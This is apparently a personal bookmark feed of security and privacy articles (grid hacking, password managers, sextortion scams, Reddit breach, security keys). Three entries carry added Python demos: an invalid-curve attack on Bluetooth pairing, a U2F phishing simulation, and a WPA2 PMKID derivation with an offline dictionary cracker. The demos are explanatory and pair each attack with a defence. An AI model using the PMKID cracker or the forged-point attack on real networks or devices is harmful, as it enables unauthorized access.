rgl7194 + security   3132

Hacking The Electric Grid Is Damned Hard | FiveThirtyEight
The nightmare is easy enough to imagine. Nefarious baddies sit in a dark room, illuminated by the green glow of a computer screen. Meanwhile, technicians watch in horror from somewhere in the Midwest as they lose control of their electrical systems. And, suddenly, hundreds of thousands, even millions of Americans are plunged into darkness.
That scene was evoked in recent weeks as federal security experts at the Department of Homeland Security warned that state-sponsored hackers have targeted more than American elections — they’re after the electric grid, too. They’ve gotten “to the point where they could have thrown switches,” a DHS official told The Wall Street Journal. Both DHS and the FBI have linked these attacks to Russia — which was already pinned as the culprit in two attacks that shut down power to hundreds of thousands of people in Ukraine two Decembers in a row, in 2015 and 2016. It’s all very urgent — a high-risk crisis that must be solved immediately.
security  hack  electric  538 
5 days ago by rgl7194
How I Use 1Password – The Sweet Setup
What’s in my 1Password
Now, it’s been a while since I set up a brand new Mac, or since I erased my Mac in order to install the latest OS on a clean slate, or since I set up a new iPhone from scratch rather than an iCloud backup.
But… my point is that when setting up a new computer or iOS device, 1Password is among the very first apps I install.
A brief perusal through my 1Password library, and I can see that I’ve been using this app for nearly 10 years. I’ve got some passwords in here (for old websites I don’t use any longer) that were created as early as December 2008. They’ve been modified since then, of course.
1Password holds the login information to every single website and service that I use. From my personal bank to my business website hosting to my favorite online photo printer. And that’s just the start. Heck, I even have a login for my thermostat.
Here’s a quick look at what all I store in 1Password and why it’s so helpful.
1password  privacy  security  passwords  credit_cards  2FA  family  legacy  cars 
7 days ago by rgl7194
Researchers Developed Artificial Intelligence-Powered Stealthy Malware
Artificial Intelligence (AI) has been seen as a potential solution for automatically detecting and combating malware, and for stopping cyber attacks before they affect an organization.
However, the same technology can also be weaponized by threat actors to power a new generation of malware that evades even the best cyber-security defenses and infects a computer network, or launches an attack, only when a specific trigger such as the target's face is detected by the camera.
To demonstrate this scenario, security researchers at IBM Research came up with DeepLocker, a new breed of "highly targeted and evasive" attack tool powered by AI, which conceals its malicious intent until it reaches a specific victim.
According to the IBM researchers, DeepLocker flies under the radar without being detected and "unleashes its malicious action as soon as the AI model identifies the target through indicators like facial recognition, geolocation and voice recognition."
security  privacy  malware  AI/ML  facial_recognition  IBM  research 
7 days ago by rgl7194
New facial recognition tool tracks targets across social networks - The Verge
The open-source program is designed for security researchers
Today, researchers at Trustwave released a new open-source tool called Social Mapper, which uses facial recognition to track subjects across social media networks. Designed for security researchers performing social engineering attacks, the system automatically locates profiles on Facebook, Instagram, Twitter, LinkedIn, and other networks based on a name and picture.
Those searches can already be performed manually, but the automated process means it can be performed far faster and for many people at once. “Performing intelligence gathering online is a time-consuming process,” Trustwave explained in a post this morning. “What if it could be automated and done on a mass scale with hundreds or thousands of individuals?”
security  privacy  facial_recognition  social_media  open_source  software 
7 days ago by rgl7194
HTTP Security Considerations - An Introduction To HTTP Basics
HTTP is ubiquitous now, with pretty much everything being powered by an API, a web application or some kind of cloud-based, HTTP-driven infrastructure. With that, HTTP security becomes paramount, and to secure HTTP you have to understand it.
HTTP is the protocol that powers the web, and to attack a web service it pays to have a good, solid foundational understanding of HTTP: how it works and the common response codes, many of which can point an attacker toward some kind of exploitable vulnerability.
HTTP/S  101  security  privacy  web 
7 days ago by rgl7194
Sextortion Scam Uses Recipient’s Hacked Passwords — Krebs on Security
Here’s a clever new twist on an old email scam that could serve to make the con far more believable. The message purports to have been sent from a hacker who’s compromised your computer and used your webcam to record a video of you while you were watching porn. The missive threatens to release the video to all your contacts unless you pay a Bitcoin ransom. The new twist? The email now references a real password previously tied to the recipient’s email address.
The basic elements of this sextortion scam email have been around for some time, and usually the only thing that changes with this particular message is the Bitcoin address that frightened targets can use to pay the amount demanded. But this one begins with an unusual opening salvo:
“I’m aware that <substitute password formerly used by recipient here> is your password,” reads the salutation...
email  mac  porn  privacy  security  social_engineering  krebs 
8 days ago by rgl7194
You could have invented that Bluetooth attack | Trail of Bits Blog
A serious Bluetooth bug has received quite a bit of attention lately. It’s a great find by Biham and Neumann. Given BLE’s popularity in the patch-averse IoT world, the bug has serious implications. And yet, it’s remarkably clean and simple. Unlike many elliptic curve bugs, an average human can totally understand this one and how it can be exploited. It’s a cool application of a conceptually approachable attack.
This post describes the bug, how invalid curve attacks are exploited in general, and how that specifically happened with the Bluetooth pairing protocol. But first, let’s take a crash course in elliptic curves and invalid curve point attacks.
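As an added illustration of the mechanism the post goes on to explain (this is example code written for this page, not Trail of Bits' or the researchers' code), here is a minimal P-256 implementation in Python whose scalar multiplication, like the vulnerable pairing code, never checks that the peer's public key lies on the curve. A man-in-the-middle who zeroes the y-coordinate hands the victim a point of order two, so the victim's Diffie-Hellman result is either the point at infinity or the attacker-known x-coordinate, depending only on the parity of the victim's private scalar. The hardened variant rejects the point. The private scalars in the demo are random and the scenario is constructed.

```python
import secrets

# NIST P-256 domain parameters (the curve used by Bluetooth Secure Simple Pairing
# and LE Secure Connections)
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
INF = None  # the point at infinity


def is_on_curve(pt):
    """True if pt satisfies y^2 = x^3 + Ax + B (mod P); INF counts as on the curve."""
    if pt is INF:
        return True
    x, y = pt
    return 0 <= x < P and 0 <= y < P and (y * y - (x * x * x + A * x + B)) % P == 0


def add(p1, p2):
    """Affine point addition. It uses only the coefficient A, so it 'works' just as
    well on points of any curve y^2 = x^3 + Ax + B' -- which is exactly the problem."""
    if p1 is INF:
        return p2
    if p2 is INF:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return INF                      # p1 == -p2; also hit when doubling a point with y == 0
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow((x2 - x1) % P, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def mul(k, pt):
    """Double-and-add scalar multiplication with no validation of pt."""
    result, addend = INF, pt
    while k:
        if k & 1:
            result = add(result, addend)
        addend = add(addend, addend)
        k >>= 1
    return result


def dhkey_unvalidated(priv, peer_pub):
    """What the buggy pairing code does: DHKey is the x-coordinate of priv * peer_pub,
    with no check that peer_pub is on P-256. Returns None if the result is INF."""
    shared = mul(priv, peer_pub)
    return None if shared is INF else shared[0]


def dhkey_validated(priv, peer_pub):
    """The fix: reject any public key that is not a finite point on the curve."""
    if peer_pub is INF or not is_on_curve(peer_pub):
        raise ValueError("peer public key is not on P-256; abort pairing")
    return dhkey_unvalidated(priv, peer_pub)


def mitm_zero_y(peer_pub):
    """Attacker's manipulation of a public key in transit: keep x, set y to 0.
    (x, 0) has order 2 on whichever curve it lies on, so k*(x,0) is INF for even k
    and (x, 0) itself for odd k -- two outcomes, both known to the attacker."""
    return (peer_pub[0], 0)


if __name__ == "__main__":
    a = secrets.randbelow(N - 1) + 1                 # victim's private scalar
    b_pub = mul(secrets.randbelow(N - 1) + 1, G)     # honest peer's public key
    forged = mitm_zero_y(b_pub)
    print("forged point on curve?", is_on_curve(forged))
    print("victim's unvalidated DHKey:", dhkey_unvalidated(a, forged))
    print("attacker can predict it:", dhkey_unvalidated(a, forged) in (None, forged[0]))
```

With the y-coordinate zeroed in both directions, each side's DHKey collapses to one of two attacker-known values, so the man-in-the-middle guesses both correctly with probability 1/4 per pairing attempt and simply lets the other attempts fail. The only robust countermeasure is the one in dhkey_validated: refuse any public key that does not satisfy the curve equation before using it.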
bluetooth  bug  security  privacy  hack  math 
8 days ago by rgl7194
Identifying People by Metadata - Schneier on Security
Interesting research: "You are your Metadata: Identification and Obfuscation of Social Media Users using Metadata Information," by Beatrice Perez, Mirco Musolesi, and Gianluca Stringhini.
Abstract: Metadata are associated with most of the information we produce in our daily interactions and communication in the digital world. Yet, surprisingly, metadata are often still categorized as non-sensitive. Indeed, in the past, researchers and practitioners have mainly focused on the problem of the identification of a user from the content of a message.
privacy  metadata  ID  security 
10 days ago by rgl7194
How to get away with financial fraud | News | The Guardian
Some of the world’s biggest scandals have gone unspotted for years. The nature of fraud is that it works outside our field of vision. By Dan Davies
“Guys, you’ve got to hear this,” I said. I was sitting in front of my computer one day in July 2012, with one eye on a screen of share prices and the other on a live stream of the House of Commons Treasury select committee hearings. As the Barclays share price took a graceful swan dive, I pulled my headphones out of the socket and turned up the volume so everyone could hear. My colleagues left their terminals and came around to watch BBC Parliament with me.
It didn’t take long to realise what was happening. “Bob’s getting murdered,” someone said.
finances  corruption  security  crime  money 
10 days ago by rgl7194
On Financial Fraud - Schneier on Security
There are some good lessons in this article on financial fraud:
That's how we got it so wrong. We were looking for incidental breaches of technical regulations, not systematic crime. And the thing is, that's normal. The nature of fraud is that it works outside your field of vision, subverting the normal checks and balances so that the world changes while the picture stays the same. People in financial markets have been missing the wood for the trees for as long as there have been markets.
finances  corruption  security  crime  money 
10 days ago by rgl7194
WPA3 - Schneier on Security
Everyone is writing about the new WPA3 Wi-Fi security standard, and how it improves security over the current WPA2 standard.
This summary is as good as any other:
The first big new feature in WPA3 is protection against offline, password-guessing attacks. This is where an attacker captures data from your Wi-Fi stream, brings it back to a private computer, and guesses passwords over and over again until they find a match. With WPA3, attackers are only supposed to be able to make a single guess against that offline data before it becomes useless; they'll instead have to interact with the live Wi-Fi device every time they want to make a guess. (And that's harder since they need to be physically present, and devices can be set up to protect against repeat guesses.)
WPA3's other major addition, as highlighted by the Alliance, is forward secrecy. This is a privacy feature that prevents older data from being compromised by a later attack. So if an attacker captures an encrypted Wi-Fi transmission, then cracks the password, they still won't be able to read the older data -- they'd only be able to see new information currently flowing over the network.
Note that we're just getting the new standard this week. Actual devices that implement the standard are still months away.
wi-fi  security  privacy  WPA3 
10 days ago by rgl7194
Free Facial Recognition Tool Can Track People Across Social Media Sites
Security researchers at Trustwave have released a new open-source tool that uses facial recognition technology to locate targets across numerous social media networks on a large scale.
Dubbed Social Mapper, the facial recognition tool automatically searches for targets across eight social media platforms, including Facebook, Instagram, Twitter, LinkedIn, Google+, the Russian social networking site VKontakte, and China's Weibo and Douban, based on their names and pictures.
The tool's creators say they developed the Social Mapper intelligence-gathering tool predominantly to help pen testers and red teamers with social engineering attacks.
social_media  facial_recognition  open_source  software  security  privacy 
10 days ago by rgl7194
Google: Security Keys Neutralized Employee Phishing — Krebs on Security
Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes, the company told KrebsOnSecurity.
A YubiKey Security Key made by Yubico. The basic model featured here retails for $20.
Security Keys are inexpensive USB-based devices that offer an alternative approach to two-factor authentication (2FA), which requires the user to log in to a Web site using something they know (the password) and something they have (e.g., a mobile device).
A Google spokesperson said Security Keys now form the basis of all account access at Google.
google  USB  security  privacy  2FA  krebs 
10 days ago by rgl7194
Google Employees Use a Physical Token as Their Second Authentication Factor - Schneier on Security
Krebs on Security is reporting that all 85,000 Google employees use two-factor authentication with a physical token.
A Google spokesperson said Security Keys now form the basis of all account access at Google.
"We have had no reported or confirmed account takeovers since implementing security keys at Google," the spokesperson said. "Users might be asked to authenticate using their security key for many different apps/reasons. It all depends on the sensitivity of the app and the risk of the user at that point in time."
Now Google is selling that security to its users:
On Wednesday, the company announced its new Titan security key, a device that protects your accounts by restricting two-factor authentication to the physical world. It's available as a USB stick and in a Bluetooth variation, and like similar products by Yubico and Feitian, it utilizes the protocol approved by the FIDO alliance. That means it'll be compatible with pretty much any service that enables users to turn on Universal 2nd Factor Authentication (U2F).
google  USB  security  privacy  2FA 
10 days ago by rgl7194
Titan Security Keys – Google launches its own USB-based FIDO U2F Keys
At the Google Cloud Next '18 conference in San Francisco, the company introduced Titan Security Keys, a tiny USB device, similar to Yubico's YubiKey, that offers hardware-based two-factor authentication for your online accounts with a high level of protection against phishing attacks.
These hardware-based security keys are more effective at preventing phishing, man-in-the-middle (MITM) and other account-takeover attacks than 2FA via SMS: even if your credentials are compromised, login is impossible without the physical key, and the key only answers for the site it was registered with.
Earlier this week Google revealed that its 85,000 employees have been using physical security keys internally for months, and since then none of them has fallen victim to phishing attacks.
Compared with SMS codes, Universal 2nd Factor (U2F) is extremely difficult to compromise, while also aiming to make the two-factor login process simpler and faster.
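What makes a U2F key phishing-resistant is not the USB form factor but the fact that the browser, not the web page, puts the origin it is really talking to into the data the key signs, and the key's per-site credential is bound to that origin. The Python simulation below is an added illustration written for this page, not Google's, Yubico's or the FIDO Alliance's code: it models the registration and authentication round trips with the same fields real U2F signs (application parameter, user-presence flag, counter, challenge parameter), but replaces the key's ECDSA P-256 signature with an HMAC over those fields so it runs on the standard library alone; that substitution is the one deliberate simplification. All origins, user names and challenges are made up.

```python
import hashlib
import hmac
import json
import secrets


class Authenticator:
    """Stand-in for the security key. A real key derives or wraps a per-registration
    private key so that a key handle only works with the app id it was created for."""

    def __init__(self):
        self.device_secret = secrets.token_bytes(32)
        self.counter = 0

    def _site_key(self, app_param: bytes, key_handle: bytes) -> bytes:
        return hmac.new(self.device_secret, app_param + key_handle, hashlib.sha256).digest()

    def register(self, app_param: bytes):
        key_handle = secrets.token_bytes(16)
        # Real U2F returns an ECDSA public key; the HMAC key stands in for it here.
        return key_handle, self._site_key(app_param, key_handle)

    def authenticate(self, app_param: bytes, key_handle: bytes, challenge_param: bytes):
        self.counter += 1
        counter = self.counter.to_bytes(4, "big")
        signed = app_param + b"\x01" + counter + challenge_param   # 0x01 = user presence
        sig = hmac.new(self._site_key(app_param, key_handle), signed, hashlib.sha256).digest()
        return counter, sig


class Browser:
    """The browser fills in the origin it is actually connected to; the page cannot lie about it."""

    def __init__(self, authenticator: Authenticator):
        self.key = authenticator

    def register(self, origin: str):
        return self.key.register(hashlib.sha256(origin.encode()).digest())

    def sign(self, origin: str, key_handle: bytes, challenge: str):
        client_data = json.dumps({"typ": "navigator.id.getAssertion",
                                  "challenge": challenge, "origin": origin},
                                 sort_keys=True).encode()
        app_param = hashlib.sha256(origin.encode()).digest()
        challenge_param = hashlib.sha256(client_data).digest()
        counter, sig = self.key.authenticate(app_param, key_handle, challenge_param)
        return client_data, counter, sig


class RelyingParty:
    def __init__(self, origin: str):
        self.origin = origin
        self.app_param = hashlib.sha256(origin.encode()).digest()
        self.users = {}   # user -> (key_handle, registered key, last counter)

    def register(self, user: str, browser: Browser):
        key_handle, pub = browser.register(self.origin)
        self.users[user] = (key_handle, pub, 0)

    def new_challenge(self) -> str:
        return secrets.token_urlsafe(32)

    def verify(self, user, challenge, client_data, counter, sig) -> bool:
        key_handle, pub, last_counter = self.users[user]
        cd = json.loads(client_data)
        if cd.get("origin") != self.origin or cd.get("challenge") != challenge:
            return False                                   # wrong site or stale challenge
        signed = self.app_param + b"\x01" + counter + hashlib.sha256(client_data).digest()
        if not hmac.compare_digest(hmac.new(pub, signed, hashlib.sha256).digest(), sig):
            return False                                   # key was not bound to our app id
        if int.from_bytes(counter, "big") <= last_counter:
            return False                                   # replay, or a cloned key
        self.users[user] = (key_handle, pub, int.from_bytes(counter, "big"))
        return True


def legitimate_login(rp: RelyingParty, user: str, browser: Browser) -> bool:
    challenge = rp.new_challenge()
    client_data, counter, sig = browser.sign(rp.origin, rp.users[user][0], challenge)
    return rp.verify(user, challenge, client_data, counter, sig)


def phishing_relay(rp: RelyingParty, user: str, browser: Browser, phish_origin: str) -> bool:
    """A phishing site relays the real challenge and key handle to the victim in real time.
    The victim's browser still signs for phish_origin, so the RP rejects the assertion."""
    challenge = rp.new_challenge()
    client_data, counter, sig = browser.sign(phish_origin, rp.users[user][0], challenge)
    return rp.verify(user, challenge, client_data, counter, sig)
```

Note that the relay fails twice over: the client data names the wrong origin, and even if that check were removed, the application parameter derived from the phishing origin selects a different per-site key, so the signature would not verify. An SMS code has neither property, which is the gap the Reddit breach below illustrates.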
google  USB  security  privacy  2FA 
10 days ago by rgl7194
iOS Lock Screen: Guide to Keep Data off Your iPhone Lock Screen | The Mac Security Blog
We use our iOS devices to keep us up to date on important information. With notifications that can display on your iPhone lock screen, you can see who's emailed you, important messages, and much more. But with the default iOS settings, sometimes private data that you don't want others to see can display on your lock screen, and anyone who can see your iPhone or iPad can potentially access personal information on your iPhone, even if it's locked.
This means if your iPhone is lost or stolen, whoever has your iOS device will not need your passcode to look at the information that displays on the iOS lock screen. Even someone who randomly walks by your phone when you're not there could potentially see sensitive information displayed on it while it's locked.
Fortunately, Apple's iOS contains a number of privacy settings to control what data can display on your lock screen, but many people ignore these options. Want to keep your sensitive information private? In this guide, we'll show you what you can control and how to change these settings to keep private data off your iPhone lock screen.
iphone  homescreen  security  privacy  ios 
10 days ago by rgl7194
New Method Simplifies Cracking WPA/WPA2 Passwords on 802.11 Networks
A new technique has been discovered to easily retrieve the Pairwise Master Key Identifier (PMKID) from a router using WPA/WPA2 security, which can then be used to crack the wireless password of the router offline. While previous WPA/WPA2 cracking methods required an attacker to wait for a user to log in to a wireless network and capture a full four-way authentication handshake, this new method only requires a single frame, which the attacker can request from the AP because it is a regular part of the protocol.
This new method was discovered by Jens "atom" Steube, the developer of the popular Hashcat password-cracking tool, while looking for new ways to attack the WPA3 wireless security protocol. According to Steube, this method works against almost all routers using 802.11i/p/q/r networks with roaming enabled.
The method works by extracting the RSN IE (Robust Security Network Information Element) from a single EAPOL frame: the first message of the four-way handshake, which the AP sends as soon as the attacker's own station associates, so no legitimate client needs to be present. The RSN IE is an optional field that contains the PMKID, which the router derives from the PMK and the MAC addresses of the AP and the station. Because the PMK of a WPA2-PSK network is itself derived from the passphrase and the SSID, a captured PMKID is enough for an offline dictionary attack on the passphrase.
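To make the derivation chain concrete, here is a small Python re-implementation of the PMKID computation and of the offline dictionary attack that hashcat automates. This is example code written for this page, not hashcat's code; the SSID, passphrase, MAC addresses and candidate wordlist are constructed for the example. It also reads and writes the `PMKID*MAC_AP*MAC_STA*ESSID` line format that hashcat's mode 16800 consumes, with the ESSID hex-encoded.

```python
import hashlib
import hmac

# Constructed sample network for this example (not a real capture)
SSID = "ExampleNet"
PASSPHRASE = "correct horse battery"
AP_MAC = "aa:bb:cc:dd:ee:01"
STA_MAC = "aa:bb:cc:dd:ee:02"


def mac_bytes(mac: str) -> bytes:
    """'aa:bb:cc:dd:ee:01' or 'aabbccddee01' -> 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def pmk_from_passphrase(ssid: str, passphrase: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    This is the expensive step the attacker must repeat for every candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: str, sta_mac: str) -> bytes:
    """802.11i: PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA).
    Every input except the PMK is public, which is why one captured PMKID suffices."""
    data = b"PMK Name" + mac_bytes(ap_mac) + mac_bytes(sta_mac)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def hashcat_16800_line(pmkid_hex: str, ap_mac: str, sta_mac: str, ssid: str) -> str:
    """hashcat mode 16800 input: PMKID*MAC_AP*MAC_STA*ESSID, with the ESSID hex-encoded."""
    return "*".join([pmkid_hex, mac_bytes(ap_mac).hex(), mac_bytes(sta_mac).hex(),
                     ssid.encode().hex()])


def parse_16800_line(line: str):
    pmkid_hex, ap, sta, essid_hex = line.strip().split("*")
    return bytes.fromhex(pmkid_hex), ap, sta, bytes.fromhex(essid_hex).decode()


def crack_pmkid(line: str, wordlist):
    """Offline dictionary attack: returns the passphrase whose PMKID matches, else None."""
    target, ap, sta, ssid = parse_16800_line(line)
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(ssid, candidate), ap, sta), target):
            return candidate
    return None


def sample_capture_line() -> str:
    """Builds the 16800 line a sniffer would produce for the constructed network."""
    target = pmkid(pmk_from_passphrase(SSID, PASSPHRASE), AP_MAC, STA_MAC)
    return hashcat_16800_line(target.hex(), AP_MAC, STA_MAC, SSID)


if __name__ == "__main__":
    line = sample_capture_line()
    print(line)
    print("recovered:", crack_pmkid(line, ["password", "letmein", PASSPHRASE]))
```

All of the cost sits in pmk_from_passphrase; the PMKID trick only removes the need to wait for a client, it does not make each guess cheaper. The practical defence is therefore the same as for handshake captures: a long random passphrase (or WPA3-SAE, whose exchange leaks nothing usable offline), not hiding the SSID or filtering MAC addresses.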
security  privacy  wi-fi  hack  router 
10 days ago by rgl7194
In-vehicle wireless devices are endangering emergency first responders | Ars Technica
Gateways are supposed to make cops safer. Many leak their locations in real time.
In late 2016, security researcher Justin Shattuck was on assignment for an organization that was under a crippling denial-of-service attack by a large number of devices, some of which appeared to be hosted inside the network of a large European airport. As he scanned the airport’s network from the Internet—and later, with the airport operators’ permission, from inside the network—he was eventually able to confirm that the devices were indeed part of several previously unseen botnets that were delivering record-setting denial-of-service attacks on websites.
One of the infected devices was a wireless gateway from Sierra Wireless. Authorized IT administrators used it to connect to the airport network in the event that primary connection methods failed. Surprised that such a sensitive piece of equipment could become a foot soldier in a denial-of-service attack, Shattuck began to investigate. What he found shocked him. Not only did an Internet scan show that 40,000 such gateways were running in other networks, but a large percentage of them were exposing a staggering amount of sensitive data about the networks they were connected to.
IoT  emergency  police  security  privacy  hack  botnet  IT/IS 
10 days ago by rgl7194
Reddit Breach Highlights Limits of SMS-Based Authentication — Krebs on Security
Reddit.com today disclosed that a data breach exposed some internal data, as well as email addresses and passwords for some Reddit users. As Web site breaches go, this one doesn’t seem too severe. What’s interesting about the incident is that it showcases once again why relying on mobile text messages (SMS) for two-factor authentication (2FA) can lull companies and end users into a false sense of security.
In a post to Reddit, the social news aggregation platform said it learned on June 19 that between June 14 and 18 an attacker had compromised several employee accounts at its cloud and source code hosting providers.
Reddit said the exposed data included internal source code as well as email addresses and obfuscated passwords for all Reddit users who registered accounts on the site prior to May 2007. The incident also exposed the email addresses of some users who had signed up to receive daily email digests of specific discussion threads.
security  privacy  breach  hack  2FA  data  krebs 
11 days ago by rgl7194
Reddit Hacked – Emails, Passwords, Private Messages Stolen
Another day, another significant data breach.
This time the victim is Reddit... it seems someone is really pissed off with Reddit's account-ban policy or biased moderators.
The Reddit social media network today announced that it suffered a security breach in June that exposed some of its users' data, including their current email addresses and an old 2007 database backup containing usernames and hashed passwords.
According to Reddit, the unknown hacker(s) managed to gain read-only access to some of its systems that contained its users' backup data, source code, internal logs, and other files.
security  privacy  breach  hack  2FA  data 
11 days ago by rgl7194
Reddit Announces Security Breach After Hackers Bypassed Staff's 2FA
Reddit announced a security breach today. The social platform says a hacker (or hackers) breached the accounts of several employees after bypassing two-factor authentication (2FA) and stole information such as some email addresses, logs, and a 2007 database backup containing old salted and hashed passwords.
The hack took place between June 14 and June 18. Reddit said it discovered the breach the next day, on June 19.
Reddit said the hacker never got "write access" to its servers.
"They were not able to alter Reddit information, and we have taken steps since the event to further lock down and rotate all production secrets and API keys, and to enhance our logging and monitoring systems," the company said.
security  privacy  breach  hack  2FA  data 
11 days ago by rgl7194
Apple’s Quick Look Reveals Your Darkest Secrets | The Mac Security Blog
For more than a decade, macOS has included a feature called Quick Look that makes it easy to preview files right within the Finder, without having to launch an app.
While Quick Look can certainly be a useful feature, its implementation in macOS has some surprising and potentially disturbing privacy implications.
Let's take a look at why the feature may be problematic and what you can do to safeguard your private data.
mac  security  privacy  preview  macosxhints  filevault 
11 days ago by rgl7194
Everybody and their mother is blocking ads, so why aren’t you? - Malwarebytes Labs | Malwarebytes Labs
This post may ruffle a few feathers. But we’re not here to offer advice to publishers on how to best generate revenue for their brand. Rather, we’re here to offer the best advice on how to maintain a safe and secure environment.
If you’re not blocking advertisements on your PC and mobile device, you should be! And if you know someone who isn’t blocking ads, then forward this post to them. Because in this two-part series, we’re going to dispel some of the myths surrounding ad blocking, and we’ll cover the reasons you should be blocking ads on your network and devices.
Part 2 of this series concludes by discussing common tools and configurations to show you How to block ads like a pro.
You’ve heard the talk and seen the messages in online banners. You’re aware of the disputes and the provocation from publishers and advertisers that ad blocking is a morally unconscionable act whose users deserve outright banishment from the web. Maybe you’ve been swayed by the pleas from website owners and have empathy towards the fragile budgetary constraints of your favorite sites. Or maybe you don’t understand the risks associated with online tracking and advertising and think that if you don’t click ads you’ll be fine.
security  privacy  adblock  malware  tracking 
11 days ago by rgl7194
Researcher Discloses Potential Brute Force Attack on iPhone; Apple Says It's Not Real - SecureMac
A strong passcode is one of the most important elements of personal security on iOS devices. While it has been some time since Apple introduced the stronger six-digit passcodes (which they now recommend), many people continue to use the four-digit PIN. According to one recent report by a security researcher, the iPhone could be vulnerable to an extremely simple brute force attack which would render those four digits useless. However, Apple has since taken the public stance that the vulnerability as described does not exist. What’s going on here?
In a video posted by the researcher, Matthew Hickey, he demonstrates an attack using the iPhone’s USB connection to send password attempts to the device. Instead of sending each string individually (e.g., 0000, then 0001, then 0002), every possible combination all the way up to 9999 is sent to the phone en masse. According to Hickey, iOS becomes overwhelmed, and the string takes priority over any other system functions. It then tries each one, supposedly bypassing both the lock and the setting that erases the device after ten failures. At first glance, this would seem to be a serious and extremely simple attack to execute.
encryption  ios11  iphone  privacy  security  USB 
11 days ago by rgl7194
White hat, black hat, and the emergence of the gray hat: the true costs of cybercrime - Malwarebytes Labs | Malwarebytes Labs
Osterman Research recently completed a major survey on behalf of Malwarebytes to determine the actual cost of cybercrime to businesses. Many studies have focused on the cost of lost reputation, lost future business, and other consequences of cybercrime—and while these are certainly valid considerations—we wanted to understand the direct costs of cybercrime. To do so, we surveyed mid-sized and large organizations on a variety of issues, but focused on three cost components:
Security budgets
The cost of remediating “major” events, e.g., events like a widespread ransomware infection or major data breach that would be highly disruptive to an organization and might take it offline for some period of time
The cost of cybercrime perpetrated by “gray hats;” those employees who dabble in cybercrime without giving up their day job as a security professional
Here’s what we discovered...
cybercrime  security  privacy 
11 days ago by rgl7194
Porn Blackmail Scam Rattles Mac Users: What You Need to Know | The Mac Security Blog
Our experiences online today seem, at times, much like life was probably like in the Wild West about 145 years ago. Today, online thieves are out to get as much from you as possible. And when you connect to the Internet, you're vulnerable to malware and hackers — it simply does not matter what computer or operating system you're using.
The latest trick up cybercriminals' sleeves is a ploy utilizing a mix of social engineering and blackmail: a scam email from someone claiming to have hacked your computer's webcam and recorded your activities while you allegedly watched porn. The email claims you downloaded their virus while watching porn, siphoning your contacts, and they threaten to send the video of you to all of your friends, family and coworkers unless you pay a ransom in Bitcoin (BTC). (We've seen demands of anywhere between $300 and $3,000 USD or higher.)
Although such schemes have been widespread in various parts of the world — Australia and the Middle East — we have recently seen these showing up in large numbers across the United States. For this reason, we feel it's important to clarify a few things and provide assistance on the best way to protect yourself.
security  privacy  mac  email  porn  social_engineering 
11 days ago by rgl7194
Social engineering attacks: What makes you susceptible? - Malwarebytes Labs | Malwarebytes Labs
We now live in a world where holding the door open for someone balancing a tray of steaming hot coffee—she can’t seem to get her access card out to place it near the reader—is something we need to think twice about. Courtesy isn’t dead, mind you, but in this case, you’d almost wish it were. Because the door opens to a restricted facility. Do you let her in? If she really can’t reach her card, the answer is clearly yes. But what if there’s something else going on?
Holding the door open for people in need of assistance is considered common courtesy. But when someone assumes the role of a distressed woman to count on your desire to help, your thoughtful gesture suddenly becomes a dangerous one. Now, you’ve just made it easier for someone to get into a restricted facility they otherwise had no access or right to. So what does that make you? A victim of social engineering.
Social engineering is a term you often hear IT pros and cybersecurity experts use when talking about Internet threats like phishing, scams, and even certain kinds of malware, such as ransomware. But its definition is even broader. Social engineering is the manipulation of, or the taking advantage of, human qualities to serve an attacker’s purpose.
It is imperative, then, that we protect ourselves from such social engineering tactics the same way we protect our devices from malware. With due diligence, we can make it difficult for social engineers to get what they want.
social_engineering  security  privacy 
12 days ago by rgl7194
1Password Implements New Feature to Keep Travelers' Passwords Safe - SecureMac
Over the past several years, international travel has become fraught with more privacy and security concerns than ever before. At many borders, including those in the United States, customs agents are increasingly asking travelers to unlock their phones and hand over their laptops for inspection. Government agencies claim this is an anti-terrorism measure, as well as being aimed at combating fraud and trafficking in illegal materials. For many, this feels like an invasion of privacy.
For those with password managers on their devices, this is an especially big concern. When traveling overseas, putting your passwords at risk is wholly unacceptable, especially for individuals such as journalists. 1Password, one of the most popular management apps, has chosen to take a proactive step towards making it easier to protect your passwords from prying eyes while traveling.
1password  passwords  travel  security  privacy 
12 days ago by rgl7194
1Password's Travel Mode - Schneier on Security
The 1Password password manager has just introduced "travel mode," which allows you to delete your stored passwords when you're in other countries or crossing borders:
Your vaults aren't just hidden; they're completely removed from your devices as long as Travel Mode is on. That includes every item and all your encryption keys. There are no traces left for anyone to find. So even if you're asked to unlock 1Password by someone at the border, there's no way for them to tell that Travel Mode is even enabled.
In 1Password Teams, Travel Mode is even cooler. If you're a team administrator, you have total control over which secrets your employees can travel with. You can turn Travel Mode on and off for your team members, so you can ensure that company information stays safe at all times.
The way this works is important. If the scary border police demand that you unlock your 1Password vault, those passwords/keys are not there for the border police to find.
The only flaw -- and this is minor -- is that the system requires you to lie. When the scary border police ask you "do you have any other passwords?" or "have you enabled travel mode," you can't tell them the truth. In the US, lying to a federal officer is a felony.
I previously described a system that doesn't require you to lie. It's more complicated to implement, though.
This is a great feature, and I'm happy to see it implemented.
1password  passwords  travel  security  privacy 
12 days ago by rgl7194
Tech Support Scams Using Call Optimization Services to Insert Phone Numbers
